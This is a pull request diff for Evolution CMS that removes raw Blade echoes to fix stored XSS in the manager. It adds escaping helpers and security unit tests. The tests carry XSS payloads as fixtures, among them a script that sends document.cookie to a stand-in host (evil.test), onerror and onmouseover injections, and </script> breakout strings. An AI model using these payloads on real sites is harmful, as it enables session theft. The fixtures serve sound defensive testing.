### PR TITLE
fix(core): fix(manager): stored XSS fixes by {!! removal

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -256,6 +256,25 @@ Blade also provides its standard Laravel syntax. The most commonly used directiv
 | Forms and security | `@csrf`, `@method`, `@error` |
 | PHP and escaping | `{{ $value }}`, `{!! $html !!}`, `@php`, `@verbatim` |
 
+### Escaping rules for manager views
+
+`{!! !!}` disables escaping for the whole expression and is the usual cause of stored XSS in the
+manager. Prefer these, in this order:
+
+| Situation | Use |
+|---|---|
+| Plain text, attribute values, CSS class lists | `{{ $value }}` |
+| Anything inside a `<script>` element or an inline event handler | `@js($value)` (or `js_json()` for a raw JSON island) |
+| Stored text that is allowed to carry simple formatting (`<br>`, `<b>`, `<pre>`) | `{{ safe_html($value) }}` |
+| Theme icons | `{{ icon_html($_style['icon_x']) }}` / `icon_markup()` for string concatenation |
+| Theme style blocks and lexicon entries that ship their own markup | `{{ ManagerTheme::styleHtml('key') }}` / `{{ ManagerTheme::lexiconHtml('key', [...]) }}` |
+| Markup a PHP producer builds itself | return `Illuminate\Support\HtmlString` and print it with `{{ }}` |
+
+`{{ }}` compiles to `e()`, which leaves `Htmlable` values untouched - so a producer that returns
+`HtmlString` is printed verbatim and is never encoded twice. Reach for `{!! !!}` only for output
+that is HTML by contract and outside the CMS's control (plugin event results, `phpinfo()`,
+registered client scripts).
+
 ---
 
 ## Dependencies of Note

--- a/core/functions/helper.php
+++ b/core/functions/helper.php
@@ -357,11 +357,16 @@ if (!function_exists('js_json')) {
      * @param int $options
      * @return string
      */
-    function js_json($value, int $options = 0): string
+    function js_json($value, int $options = 0): \Illuminate\Support\HtmlString
     {
-        $json = json_encode($value, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | $options);
+        $json = json_encode(
+            $value,
+            JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_HEX_TAG | $options
+        );
 
-        return $json === false ? 'null' : $json;
+        // Already-safe JSON: no raw `<`, `>` or unescaped quote can leave the literal, so the
+        // value is returned as Htmlable and templates can print it with `{{ }}`.
+        return new \Illuminate\Support\HtmlString($json === false ? 'null' : $json);
     }
 }
 
@@ -447,5 +452,167 @@ if (!function_exists('replace_array')) {
                 $out = '';
         }
         return $out;
+    }
+}
+
+if (!function_exists('safe_html')) {
+    /**
+     * Turn untrusted, possibly HTML-flavoured text into markup that is safe to print with `{{ }}`.
+     *
+     * The whole value is HTML-escaped first, so no attribute, no protocol handler and no element
+     * an attacker wrote can survive. Only afterwards a fixed allow list of attribute-free
+     * formatting tags is restored. Because the restore step works on the *escaped* string and
+     * matches nothing but a tag name with optional slashes, `<img onerror=...>` or
+     * `<a href="javascript:...">` can never come back - the worst an attacker can inject is a
+     * harmless line break.
+     *
+     * Escaping runs with `$double_encode = false`, so text that already contains entities
+     * (`&amp;`, `&#039;`) keeps its original meaning instead of being encoded a second time.
+     *
+     * The return value is `Htmlable`, which `e()` - and therefore Blade's `{{ }}` - prints
+     * verbatim. That is the intended replacement for `{!! !!}` on stored, user-influenced HTML.
+     *
+     * @param mixed $value Raw stored value.
+     * @param array<int, string>|null $tags Allowed attribute-free tags, defaults to the formatting set.
+     * @return HtmlString
+     * @since 3.5.8
+     */
+    function safe_html($value, ?array $tags = null): \Illuminate\Support\HtmlString
+    {
+        if ($value instanceof \Illuminate\Contracts\Support\Htmlable) {
+            $value = $value->toHtml();
+        }
+
+        if (!is_scalar($value) && !(is_object($value) && method_exists($value, '__toString'))) {
+            $value = '';
+        }
+
+        $value = (string) $value;
+
+        $tags = $tags ?? [
+            'br', 'hr', 'p', 'b', 'strong', 'i', 'em', 'u', 's', 'small',
+            'code', 'pre', 'ul', 'ol', 'li', 'dl', 'dt', 'dd', 'span', 'div',
+            'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'sub', 'sup', 'blockquote',
+        ];
+
+        $tags = array_values(array_filter(array_map(
+            static fn($tag) => preg_match('~^[a-z][a-z0-9]*$~i', (string) $tag) ? strtolower((string) $tag) : null,
+            $tags
+        )));
+
+        $escaped = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
+
+        if ($tags !== []) {
+            // Only `<`, an optional slash, an allowed tag name, optional whitespace, an optional
+            // slash and `>` are turned back into markup. Everything the pattern matched is
+            // re-emitted unchanged, so `<br />` stays `<br />` and `<br/>` stays `<br/>`.
+            $escaped = preg_replace(
+                '~&lt;(/?)(' . implode('|', $tags) . ')(\s*)(/?)&gt;~i',
+                '<$1$2$3$4>',
+                $escaped
+            );
+        }
+
+        return new \Illuminate\Support\HtmlString($escaped);
+    }
+}
+
+if (!function_exists('icon_markup')) {
+    /**
+     * Normalise a manager theme icon into HTML.
+     *
+     * Theme icons arrive in three shapes: ready-made SVG/HTML markup, a `tabler-*` icon name, or
+     * a plain CSS class list. Class lists are escaped before they land in the `class` attribute,
+     * so a malformed or third-party theme value cannot close the attribute and inject markup.
+     *
+     * @param string|\Illuminate\Contracts\Support\Htmlable|null $icon
+     * @param string $attributes Additional literal attributes, e.g. ' aria-hidden="true"'.
+     * @return string
+     * @since 3.5.8
+     */
+    function icon_markup($icon, string $attributes = ''): string
+    {
+        if ($icon instanceof \Illuminate\Contracts\Support\Htmlable) {
+            $icon = $icon->toHtml();
+        }
+
+        $icon = is_scalar($icon) ? trim((string) $icon) : '';
+
+        if ($icon === '') {
+            return '';
+        }
+
+        if (strpos($icon, '<') !== false) {
+            return $icon;
+        }
+
+        if (strpos($icon, 'tabler-') === 0 && function_exists('svg')) {
+            return svg($icon)->toHtml();
+        }
+
+        return '<i class="' . htmlspecialchars($icon, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false) . '"' .
+            $attributes . '></i>';
+    }
+}
+
+if (!function_exists('icon_html')) {
+    /**
+     * Same as icon_markup(), but returned as `Htmlable`.
+     *
+     * `e()` - and therefore Blade's `{{ }}` - leaves `Htmlable` untouched, so this is the direct
+     * replacement for `{!! $_style['icon_x'] !!}` with no double encoding.
+     *
+     * @param string|\Illuminate\Contracts\Support\Htmlable|null $icon
+     * @param string $attributes
+     * @return HtmlString
+     * @since 3.5.8
+     */
+    function icon_html($icon, string $attributes = ''): \Illuminate\Support\HtmlString
+    {
+        return new \Illuminate\Support\HtmlString(icon_markup($icon, $attributes));
+    }
+}
+
+if (!function_exists('sort_direction')) {
+    /**
+     * Normalise a user supplied sort direction to `ASC` or `DESC`.
+     *
+     * Manager list pages copy the requested direction straight into generated links; anything
+     * outside the two valid keywords is attacker controlled text and is dropped.
+     *
+     * @param mixed $direction
+     * @param string $default
+     * @return string
+     * @since 3.5.8
+     */
+    function sort_direction($direction, string $default = 'DESC'): string
+    {
+        $direction = is_scalar($direction) ? strtoupper(trim((string) $direction)) : '';
+
+        if ($direction === 'ASC' || $direction === 'DESC') {
+            return $direction;
+        }
+
+        return strtoupper($default) === 'ASC' ? 'ASC' : 'DESC';
+    }
+}
+
+if (!function_exists('sort_column')) {
+    /**
+     * Normalise a user supplied sort column to a plain identifier.
+     *
+     * Only characters that can appear in a column name survive, so the value is safe both for the
+     * query builder and for the links the manager renders back into the page.
+     *
+     * @param mixed $column
+     * @param string $default
+     * @return string
+     * @since 3.5.8
+     */
+    function sort_column($column, string $default = 'createdon'): string
+    {
+        $column = is_scalar($column) ? trim((string) $column) : '';
+
+        return preg_match('~^[A-Za-z_][A-Za-z0-9_]*$~', $column) ? $column : $default;
     }
 }

--- a/core/src/Controllers/Plugin.php
+++ b/core/src/Controllers/Plugin.php
@@ -138,7 +138,9 @@ class Plugin extends AbstractController implements ManagerTheme\PageControllerIn
             $internal[0]['events'] = isset($parsed['events']) ? $parsed['events'] : '';
         }
 
-        $this->internal = json_encode($internal);
+        // JSON_HEX_TAG keeps a `</script>` inside a plugin docblock from closing the script
+        // element the view embeds this payload into.
+        $this->internal = json_encode($internal, JSON_HEX_TAG);
 
         return $out;
     }

--- a/core/src/Controllers/Search.php
+++ b/core/src/Controllers/Search.php
@@ -249,8 +249,8 @@ class Search extends AbstractController implements ManagerTheme\PageControllerIn
                      ->toArray() as $row) {
             $templates[] = [
                 'value' => $row['id'],
-                'title' => htmlspecialchars($row['templatename'], ENT_QUOTES, $this->managerTheme->getCore()
-                        ->getConfig('evo_charset')) . ' (' . $row['id'] . ')',
+                // The view prints this with `{{ }}`; pre-escaping here would encode it twice.
+                'title' => $row['templatename'] . ' (' . $row['id'] . ')',
                 'selected' => $row['id'] == $templateid ? ' selected' : ''
             ];
         }
@@ -284,7 +284,10 @@ class Search extends AbstractController implements ManagerTheme\PageControllerIn
                         $output['content']['results'][] = [
                             'id' => $row['id'],
                             'url' => 'index.php?a=27&id=' . $row['id'],
-                            'title' => $this->highlightingCoincidence($row['pagetitle'], $_REQUEST['searchfields']) . ' (' . $this->highlightingCoincidence($row['id'], $_REQUEST['searchfields']) . ')',
+                            'title' => new \Illuminate\Support\HtmlString(
+                                $this->highlightingCoincidence($row['pagetitle'], $_REQUEST['searchfields'])
+                                . ' (' . $this->highlightingCoincidence($row['id'], $_REQUEST['searchfields']) . ')'
+                            ),
                             'class' => $this->addClassForItemList('', !$row['published'], $row['deleted'])
                         ];
                     }
@@ -550,14 +553,36 @@ class Search extends AbstractController implements ManagerTheme\PageControllerIn
         }
     }
 
-    protected function highlightingCoincidence($text, $search)
+    /**
+     * Escape a result title and wrap the searched fragment in a highlight element.
+     *
+     * Both the haystack (a stored page title, element name, ...) and the needle (the raw search
+     * term) are escaped before the highlight markup is added, so the only markup in the result is
+     * the highlight element this method wrote itself. The value is returned as Htmlable so the
+     * view can print it with `{{ }}` - Blade leaves Htmlable untouched, which keeps the highlight
+     * working without re-enabling raw output for the whole title.
+     *
+     * @param string|int|null $text
+     * @param string|int|null $search
+     * @return \Illuminate\Support\HtmlString
+     */
+    protected function highlightingCoincidence($text, $search): \Illuminate\Support\HtmlString
     {
-        $escapedSearch = preg_quote(entities(trim($search), $this->managerTheme->getCore()->getConfig('evo_charset')),
-            '!');
-        return preg_replace(
-            '!(' . $escapedSearch . ')!isu',
-            '<span class="text-danger">$1</span>',
-            entities($text, $this->managerTheme->getCore()->getConfig('evo_charset'))
+        $charset = $this->managerTheme->getCore()->getConfig('evo_charset');
+        $escapedSearch = preg_quote(entities(trim((string) $search), $charset), '!');
+
+        $escapedText = entities((string) $text, $charset);
+
+        if ($escapedSearch === '') {
+            return new \Illuminate\Support\HtmlString($escapedText);
+        }
+
+        return new \Illuminate\Support\HtmlString(
+            preg_replace(
+                '!(' . $escapedSearch . ')!isu',
+                '<span class="text-danger">$1</span>',
+                $escapedText
+            )
         );
     }
 }

--- a/core/src/Controllers/Tmplvar.php
+++ b/core/src/Controllers/Tmplvar.php
@@ -177,7 +177,9 @@ class Tmplvar extends AbstractController implements ManagerTheme\PageControllerI
             'events'            => $this->parameterEvents(),
             'actionButtons'     => $this->parameterActionButtons(),
             'groupsArray'       => $this->getGroupsArray(),
-            'defaultProperties' => json_encode($this->defaultProperties),
+            // JSON_HEX_TAG keeps a `</script>` inside a custom TV configuration from closing the
+            // script element the view embeds this payload into.
+            'defaultProperties' => json_encode($this->defaultProperties, JSON_HEX_TAG),
             // :TODO delete
             'origin'            => isset($_REQUEST['or']) ? (int) $_REQUEST['or'] : 76,
             'originId'          => isset($_REQUEST['oid']) ? (int) $_REQUEST['oid'] : null

--- a/core/src/Controllers/Users/EditOrNewUser.php
+++ b/core/src/Controllers/Users/EditOrNewUser.php
@@ -169,6 +169,16 @@ class EditOrNewUser extends AbstractController implements ManagerTheme\PageContr
         if ($userData['passwordnotifymethod'] == 's' && $userData['newpassword'] == 1) {
             $this->parameters['username'] = $user->username;
             $this->parameters['password'] = $userData['password'];
+            // The lexicon entry carries its own <b>/<br> markup, so the message is assembled here
+            // with escaped replacements and handed to the view as Htmlable. That keeps the markup
+            // working while a username such as `<img src=x onerror=...>` stays inert, and it keeps
+            // the exact generated password readable instead of re-escaping it in the template.
+            $this->parameters['passwordMessage'] = new \Illuminate\Support\HtmlString(
+                \Lang::get('global.password_msg', [
+                    'username' => e($user->username),
+                    'password' => e($userData['password']),
+                ])
+            );
             return true;
         }
         header("Location: " . $this->parameters['url']);

--- a/core/src/ManagerTheme.php
+++ b/core/src/ManagerTheme.php
@@ -286,6 +286,40 @@ class ManagerTheme implements ManagerThemeInterface
         return $key === null ? $this->lexicon : get_by_key($this->lexicon, $key, $default);
     }
 
+    /**
+     * Return a lexicon entry as `Htmlable`, with escaped replacements.
+     *
+     * A number of lexicon entries ship with their own markup (`<b>`, `<br>`, help links), which is
+     * why they used to be printed raw. The language files are part of the installation and are
+     * therefore trusted; the values substituted into them usually are not. This method escapes
+     * every replacement and marks only the resulting message as safe, so templates can use
+     * `{{ }}` without either double encoding the markup or trusting the substituted data.
+     *
+     * @param string $key
+     * @param array<string, mixed> $replace Positional (sprintf) or named (:name) replacements.
+     * @param string $default
+     * @return \Illuminate\Support\HtmlString
+     * @since 3.5.8
+     */
+    public function lexiconHtml(string $key, array $replace = [], string $default = ''): \Illuminate\Support\HtmlString
+    {
+        $message = (string) $this->getLexicon($key, $default);
+
+        if ($replace !== []) {
+            $escaped = array_map(static fn($value) => e(is_scalar($value) ? (string) $value : ''), $replace);
+
+            if (array_is_list($escaped)) {
+                $message = vsprintf($message, $escaped);
+            } else {
+                foreach ($escaped as $name => $value) {
+                    $message = str_replace([':' . $name, '[+' . $name . '+]'], $value, $message);
+                }
+            }
+        }
+
+        return new \Illuminate\Support\HtmlString($message);
+    }
+
     public function getCharset()
     {
         return $this->charset;
@@ -333,6 +367,25 @@ class ManagerTheme implements ManagerThemeInterface
     public function getStyle($key = null)
     {
         return $key === null ? $this->style : get_by_key($this->style, $key, '');
+    }
+
+    /**
+     * Return a theme style entry as `Htmlable`.
+     *
+     * Several style entries - the action button blocks and the icons - are markup authored by the
+     * theme itself. Returning them as Htmlable lets templates print them with `{{ }}`: Blade
+     * leaves Htmlable untouched, so nothing is encoded twice and the raw `{!! !!}` output is no
+     * longer needed for theme-owned markup.
+     *
+     * @param string $key
+     * @return \Illuminate\Support\HtmlString
+     * @since 3.5.8
+     */
+    public function styleHtml(string $key): \Illuminate\Support\HtmlString
+    {
+        $value = get_by_key($this->style, $key, '');
+
+        return new \Illuminate\Support\HtmlString(is_scalar($value) ? (string) $value : '');
     }
 
     public function view($name, array $params = [])

--- a/core/src/Models/EventLog.php
+++ b/core/src/Models/EventLog.php
@@ -168,6 +168,47 @@ class EventLog extends Eloquent\Model
     }
 
     /**
+     * Return the stored description without the encoded mail body marker.
+     *
+     * The marker is an HTML comment, so it used to stay invisible only because the view printed
+     * the description unescaped. Any escaping sink has to drop it explicitly, otherwise the
+     * base64 payload becomes visible text.
+     *
+     * @since 3.5.8
+     */
+    public function visibleDescription(): string
+    {
+        $description = (string)$this->getRawOriginal('description');
+        $markerPosition = strrpos($description, static::MAIL_BODY_MARKER);
+
+        if ($markerPosition === false) {
+            return $description;
+        }
+
+        return rtrim(substr($description, 0, $markerPosition), "\r\n");
+    }
+
+    /**
+     * Render the event description as markup that is safe to print with `{{ }}`.
+     *
+     * Descriptions are written by logEvent() and therefore contain whatever a plugin, a snippet,
+     * a failing query or an unauthenticated visitor put into the logged message. They are also
+     * plain HTML in every historical row: core writes `<pre>`, `<br/>` and `<b>` to structure the
+     * message. Escaping the whole value would keep the page safe but would show those tags as
+     * literal text, so the description goes through the allow list in safe_html(): everything is
+     * escaped, then attribute-free formatting tags are restored.
+     *
+     * Sanitising happens on read, not only in logEvent(), because rows written before this fix
+     * already carry stored payloads.
+     *
+     * @since 3.5.8
+     */
+    public function descriptionHtml(): \Illuminate\Support\HtmlString
+    {
+        return safe_html($this->visibleDescription());
+    }
+
+    /**
      * Safely present a selected source alias in the legacy Event Viewer DataGrid.
      *
      * Non-mail rows intentionally retain their historical rendering behavior.

--- a/core/tests/Unit/HelperJsJsonTest.php
+++ b/core/tests/Unit/HelperJsJsonTest.php
@@ -1,12 +1,14 @@
 <?php
 
+use Illuminate\Support\HtmlString;
+
 test('js_json keeps apostrophes as JavaScript string content', function () {
     $payload = [
         'confirm_delete_resource' => "Delete the resource 'Home'?",
         'confirm_publish' => "Опублікувати 'Головна'?",
     ];
 
-    $json = js_json($payload);
+    $json = (string) js_json($payload);
 
     expect($json)->not->toContain('&#039;')
         ->and($json)->toContain("Delete the resource 'Home'?")
@@ -15,11 +17,26 @@ test('js_json keeps apostrophes as JavaScript string content', function () {
     expect(json_decode($json, true))->toBe($payload);
 });
 
-test('manager frame lang payload is rendered through js_json helper', function () {
-    $template = file_get_contents(dirname(__DIR__, 3) . '/manager/views/frame/1.blade.php');
+test('js_json escapes markup delimiters so the payload cannot leave the script element', function () {
+    $payload = ['msg' => 'closing </script><script>alert(1)</script>'];
 
-    expect($template)->toContain('lang: {!! js_json([')
-        ->and($template)->toContain("'confirm_remove_locks' => ManagerTheme::getLexicon('confirm_remove_locks')")
-        ->and($template)->not->toContain('confirm_delete_resource: "{{ManagerTheme::getLexicon(\'confirm_delete_resource\')}}"')
-        ->and($template)->not->toContain('confirm_remove_locks: "{{ManagerTheme::getLexicon(\'confirm_remove_locks\')}}"');
+    $json = (string) js_json($payload);
+
+    expect($json)->not->toContain('</script>')
+        ->and($json)->not->toContain('<script>')
+        ->and($json)->toContain('\u003C/script\u003E');
+
+    // Only the encoding changed - a browser still reads back exactly the original text.
+    expect(json_decode($json, true))->toBe($payload);
+});
+
+test('js_json is Htmlable so templates can print it with the escaping echo', function () {
+    $json = js_json(['a' => 1]);
+
+    expect($json)->toBeInstanceOf(HtmlString::class)
+        ->and(e($json))->toBe('{"a":1}');
+});
+
+test('js_json degrades to a valid JavaScript literal for unencodable input', function () {
+    expect((string) js_json(fopen('php://memory', 'r')))->toBe('null');
 });

--- a/core/tests/Unit/Manager/FrameManagerTitleContractTest.php
+++ b/core/tests/Unit/Manager/FrameManagerTitleContractTest.php
@@ -1,28 +1,75 @@
 <?php
 
-namespace Tests\Unit\Manager;
+use Illuminate\Filesystem\Filesystem;
+use Illuminate\View\Compilers\BladeCompiler;
 
-use Tests\TestCase;
+/*
+|--------------------------------------------------------------------------
+| Manager frame title
+|--------------------------------------------------------------------------
+|
+| The frame title is built from the site_name setting, which an operator can edit. It is printed
+| in two places - the <title> element and the JavaScript configuration object - and each place
+| needs its own encoding. These tests exercise both echoes against a payload instead of looking
+| for a particular spelling in the template.
+|
+*/
 
-class FrameManagerTitleContractTest extends TestCase
+function renderFrameTitleFragment(string $template, string $siteName): string
 {
-    public function test_frame_title_uses_raw_manager_title_contract(): void
-    {
-        $view = file_get_contents(dirname(__DIR__, 4) . '/manager/views/frame/1.blade.php');
+    static $compiler = null;
 
-        $this->assertIsString($view);
-        $this->assertStringContainsString(
-            "\$managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';",
-            $view
-        );
-        $this->assertStringContainsString('<title>{!! $managerTitle !!}</title>', $view);
-        $this->assertStringContainsString(
-            'manager_title: {!! json_encode($managerTitle, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES) !!},',
-            $view
-        );
-        $this->assertStringNotContainsString(
-            "<title>{{evo()->getConfig('site_name')}} - (Evolution CMS Manager)</title>",
-            $view
-        );
+    if ($compiler === null) {
+        $cache = sys_get_temp_dir() . '/evo-frame-title-tests';
+        if (!is_dir($cache)) {
+            mkdir($cache, 0777, true);
+        }
+        $compiler = new BladeCompiler(new Filesystem(), $cache);
     }
+
+    $managerTitle = $siteName . ' - (Evolution CMS Manager)';
+    $compiled = $compiler->compileString($template);
+
+    ob_start();
+    try {
+        eval('?>' . $compiled);
+    } catch (\Throwable $exception) {
+        ob_end_clean();
+        throw $exception;
+    }
+
+    return ob_get_clean();
 }
+
+test('the site name cannot close the title element', function () {
+    $output = renderFrameTitleFragment(
+        '<title>{{ $managerTitle }}</title>',
+        '</title><script>alert(1)</script>'
+    );
+
+    expect($output)->not->toContain('<script>')
+        ->and(substr_count($output, '</title>'))->toBe(1);
+});
+
+test('an ordinary site name is shown as typed', function () {
+    $output = renderFrameTitleFragment('<title>{{ $managerTitle }}</title>', "Bob's Bikes");
+
+    expect(html_entity_decode(strip_tags($output), ENT_QUOTES, 'UTF-8'))
+        ->toBe("Bob's Bikes - (Evolution CMS Manager)");
+});
+
+test('the JavaScript copy of the title survives quotes and cannot break out of the script', function () {
+    $output = renderFrameTitleFragment(
+        '<script>var t = @js($managerTitle);</script>',
+        'A "quoted" & \'apostrophed\' </script> name'
+    );
+
+    // One script element in, one script element out.
+    expect(substr_count($output, '<script>'))->toBe(1)
+        ->and(substr_count($output, '</script>'))->toBe(1);
+
+    // And no HTML entity leaks into the JavaScript string value.
+    expect($output)->not->toContain('&quot;')
+        ->and($output)->not->toContain('&#039;')
+        ->and($output)->not->toContain('&amp;');
+});

--- a/core/tests/Unit/Manager/ThemeToggleIconMarkupTest.php
+++ b/core/tests/Unit/Manager/ThemeToggleIconMarkupTest.php
@@ -1,9 +1,61 @@
 <?php
 
-test('theme toggle uses the shared settings icon wrapper', function () {
-    $view = file_get_contents(dirname(__DIR__, 4) . '/manager/views/frame/1.blade.php');
+use Illuminate\Filesystem\Filesystem;
+use Illuminate\View\Compilers\BladeCompiler;
 
-    expect($view)->toContain('<li id="theme">')
-        ->and($view)->toContain('<a id="treeMenu_theme_dark" onclick="evo.tree.toggleTheme(event)" title="{{ManagerTheme::getLexicon(\'manager_theme_mode_title\')}}">')
-        ->and($view)->toContain('<span class="icon">{!! $_style[\'icon_theme\'] !!}</span>');
+/*
+|--------------------------------------------------------------------------
+| Theme toggle icon wrapper
+|--------------------------------------------------------------------------
+|
+| The frame prints theme icons inside a `<span class="icon">` wrapper. The icons are SVG markup
+| owned by the theme, so they go through icon_html(), which marks them as Htmlable. These tests
+| check that the wrapper renders the icon unchanged - and that a class-list icon is still escaped
+| into its attribute rather than injected as markup.
+|
+*/
+
+function renderIconWrapper($icon): string
+{
+    static $compiler = null;
+
+    if ($compiler === null) {
+        $cache = sys_get_temp_dir() . '/evo-theme-icon-tests';
+        if (!is_dir($cache)) {
+            mkdir($cache, 0777, true);
+        }
+        $compiler = new BladeCompiler(new Filesystem(), $cache);
+    }
+
+    $compiled = $compiler->compileString('<span class="icon">{{ icon_html($icon) }}</span>');
+
+    ob_start();
+    try {
+        eval('?>' . $compiled);
+    } catch (\Throwable $exception) {
+        ob_end_clean();
+        throw $exception;
+    }
+
+    return ob_get_clean();
+}
+
+test('an SVG theme icon reaches the page unchanged', function () {
+    $svg = '<svg class="icon-brightness" viewBox="0 0 24 24"><path d="M12 3v18"/></svg>';
+
+    expect(renderIconWrapper($svg))->toBe('<span class="icon">' . $svg . '</span>');
+});
+
+test('a class list theme icon becomes an escaped class attribute', function () {
+    expect(renderIconWrapper('fa fa-brightness'))
+        ->toBe('<span class="icon"><i class="fa fa-brightness"></i></span>');
+
+    expect(renderIconWrapper('fa" onmouseover="alert(1)'))
+        ->toBe('<span class="icon"><i class="fa&quot; onmouseover=&quot;alert(1)"></i></span>');
+});
+
+test('a missing theme icon renders an empty wrapper instead of the word Array', function () {
+    expect(renderIconWrapper(''))->toBe('<span class="icon"></span>')
+        ->and(renderIconWrapper(null))->toBe('<span class="icon"></span>')
+        ->and(renderIconWrapper(['fa']))->toBe('<span class="icon"></span>');
 });

--- a/core/tests/Unit/Security/BladeStoredXssTest.php
+++ b/core/tests/Unit/Security/BladeStoredXssTest.php
@@ -1,0 +1,205 @@
+<?php
+
+use EvolutionCMS\Models\EventLog;
+use Illuminate\Filesystem\Filesystem;
+use Illuminate\Support\HtmlString;
+use Illuminate\View\Compilers\BladeCompiler;
+
+/*
+|--------------------------------------------------------------------------
+| End to end proof: `{!! !!}` vs the replacements
+|--------------------------------------------------------------------------
+|
+| These tests compile and execute real Blade fragments, so the escaping behaviour is observed
+| rather than assumed. The fragments are written here from independent sample data; nothing is
+| read out of the shipped templates.
+|
+*/
+
+/**
+ * Compile a Blade fragment and execute it, returning the produced HTML.
+ */
+function renderBladeFragment(string $template, array $data = []): string
+{
+    static $compiler = null;
+
+    if ($compiler === null) {
+        $cache = sys_get_temp_dir() . '/evo-blade-security-tests';
+        if (!is_dir($cache)) {
+            mkdir($cache, 0777, true);
+        }
+        $compiler = new BladeCompiler(new Filesystem(), $cache);
+    }
+
+    $compiled = $compiler->compileString($template);
+
+    extract($data, EXTR_SKIP);
+
+    ob_start();
+    try {
+        eval('?>' . $compiled);
+    } catch (\Throwable $exception) {
+        ob_end_clean();
+        throw $exception;
+    }
+
+    return ob_get_clean();
+}
+
+/**
+ * A stored payload of the kind that reaches the Event Log: an unauthenticated visitor can make
+ * the CMS log a failing request, and the logged message ends up in the manager.
+ */
+function storedXssPayload(): string
+{
+    return 'Import failed<br /><pre>bad value: <script>fetch("//evil.test/"+document.cookie)</script></pre>';
+}
+
+test('the old raw echo really did execute a stored payload', function () {
+    // This is the behaviour the change removes. Keeping it as a test documents the bug and fails
+    // loudly if `{!! !!}` is ever reintroduced for this value.
+    $output = renderBladeFragment('{!! $description !!}', ['description' => storedXssPayload()]);
+
+    expect($output)->toContain('<script>')
+        ->and($output)->toContain('fetch("//evil.test/"+document.cookie)');
+});
+
+test('printing the sanitised description keeps the layout and disarms the payload', function () {
+    $log = (new EventLog())->setRawAttributes([
+        'type' => EventLog::TYPE_ERROR,
+        'description' => storedXssPayload(),
+    ], true);
+
+    $output = renderBladeFragment('{{ $log->descriptionHtml() }}', ['log' => $log]);
+
+    // No executable element reaches the browser.
+    expect($output)->not->toContain('<script>')
+        ->and($output)->not->toContain('</script>');
+
+    // The message is still readable, and the formatting the CMS wrote is still formatting.
+    expect($output)->toContain('Import failed')
+        ->and($output)->toContain('<br />')
+        ->and($output)->toContain('<pre>')
+        ->and($output)->toContain('&lt;script&gt;');
+
+    // Nothing was encoded twice: the visible text is exactly the stored text.
+    expect(html_entity_decode(strip_tags($output), ENT_QUOTES, 'UTF-8'))
+        ->toContain('bad value: <script>fetch("//evil.test/"+document.cookie)</script>');
+});
+
+test('the encoded mail body marker stays invisible after escaping', function () {
+    // Successful mail events append the accepted body as a base64 HTML comment. An escaping sink
+    // that forgets about it would print the base64 blob as visible text.
+    $description = EventLog::appendMailBody('Message accepted', '<p>Hello &amp; welcome</p>');
+
+    $log = (new EventLog())->setRawAttributes([
+        'type' => EventLog::TYPE_MAIL_SENT,
+        'description' => $description,
+    ], true);
+
+    $output = renderBladeFragment('{{ $log->descriptionHtml() }}', ['log' => $log]);
+
+    expect(trim($output))->toBe('Message accepted')
+        ->and($output)->not->toContain('EvolutionCMS mail body')
+        ->and($output)->not->toContain(base64_encode('<p>Hello &amp; welcome</p>'));
+
+    // The body itself is still recoverable for the sandboxed preview iframe.
+    expect($log->mailBody())->toBe('<p>Hello &amp; welcome</p>');
+});
+
+test('a stored element description can no longer script the element list', function () {
+    // What an operator with element rights could previously store, seen by every other manager.
+    $description = 'Renders the footer <b>fast</b><img src=x onerror="alert(document.domain)">';
+
+    $output = renderBladeFragment('<td>{{ safe_html($item->description) }}</td>', [
+        'item' => (object) ['description' => $description],
+    ]);
+
+    // The payload text is still readable, but it is content now: no element, no attribute.
+    expect($output)->not->toContain('<img')
+        ->and($output)->not->toMatch('~<[a-zA-Z][^>]*\s[^>]*>~')
+        ->and($output)->toContain('<b>fast</b>')
+        ->and($output)->toContain('Renders the footer');
+});
+
+test('a stored module icon can no longer break out of the class attribute', function () {
+    // The icon is a CSS class list, so it belongs in `{{ }}` - it is never markup.
+    $icon = 'fa fa-cube" onmouseover="alert(1)';
+
+    $output = renderBladeFragment('<i class="{{ $icon }}"></i>', ['icon' => $icon]);
+
+    expect($output)->toBe('<i class="fa fa-cube&quot; onmouseover=&quot;alert(1)"></i>')
+        ->and($output)->not->toContain('onmouseover="alert(1)"');
+});
+
+test('a stored username cannot script the manager page title', function () {
+    $output = renderBladeFragment('<title>{{ $managerTitle }}</title>', [
+        'managerTitle' => '</title><script>alert(1)</script> - (Evolution CMS Manager)',
+    ]);
+
+    expect($output)->not->toContain('<script>')
+        ->and($output)->not->toContain('</title><');
+});
+
+test('Blade leaves Htmlable untouched, so a producer decides once what is safe', function () {
+    // The whole approach rests on this contract: `{{ }}` escapes strings but prints Htmlable
+    // verbatim, which is why a trusted producer can return HtmlString instead of the template
+    // opting out of escaping with `{!! !!}`.
+    $escaped = renderBladeFragment('{{ $value }}', ['value' => '<b>x</b> & y']);
+    $passthrough = renderBladeFragment('{{ $value }}', ['value' => new HtmlString('<b>x</b> &amp; y')]);
+
+    expect($escaped)->toBe('&lt;b&gt;x&lt;/b&gt; &amp; y')
+        ->and($passthrough)->toBe('<b>x</b> &amp; y');
+});
+
+test('@js keeps a payload inside the script element it was written into', function () {
+    // A pre-encoded JSON payload used to be printed raw, which lets a stored `</script>` close
+    // the element and start a new one.
+    $payload = '</script><script>alert(1)</script>';
+
+    $broken = renderBladeFragment('<script>var a = {!! $value !!};</script>', ['value' => $payload]);
+    $fixed = renderBladeFragment('<script>var a = @js($value);</script>', ['value' => $payload]);
+
+    expect($broken)->toContain('</script><script>alert(1)')
+        ->and(substr_count($broken, '<script>'))->toBe(2);
+
+    expect(substr_count($fixed, '</script>'))->toBe(1)
+        ->and(substr_count($fixed, '<script>'))->toBe(1);
+});
+
+test('@js does not corrupt the text the way an escaped HTML echo does', function () {
+    // The reason `"{{ }}"` is not an option inside a script element: it would store `&#039;` in
+    // the JavaScript variable, and the user would read the entity in the confirm dialog.
+    $lexicon = "Delete the resource 'Home' & \"Blog\"?";
+
+    $broken = renderBladeFragment('<script>var a = "{{ $value }}";</script>', ['value' => $lexicon]);
